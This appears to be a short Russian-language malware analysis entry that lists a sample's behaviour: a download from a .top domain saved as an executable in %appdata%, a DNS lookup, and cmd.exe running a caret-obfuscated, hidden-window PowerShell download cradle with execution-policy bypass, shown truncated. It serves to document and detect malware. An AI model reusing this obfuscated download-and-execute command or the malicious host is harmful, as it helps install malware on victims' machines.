Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poW^ershe^lL^.^e^x^E -^eXE^c^UTIon^P^o^l^IC^y^ B^Y^p^aS^s -N^opR^oFILe -^wIND^O^WS^TyL^E h^IDdEN (^new^-o^bJ^ecT ^s^yst^em.N^e^T.wEB^c^Lien^t).D^o^W^N^lOad^F^IlE(^'http://toa...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "poW^ershe^lL^.^e^x^E -^eXE^c^UTIon^P^o^l^IC^y^ B^Y^p^aS^s -N^opR^oFILe -^wIND^O^WS^TyL^E h^IDdEN (^new^-o^bJ^ecT ^s^yst^em.N^e^T.wEB^c^Lien^t).D^o^W^N^lOad^F^IlE(^'http://toa...' (со скрытым окном)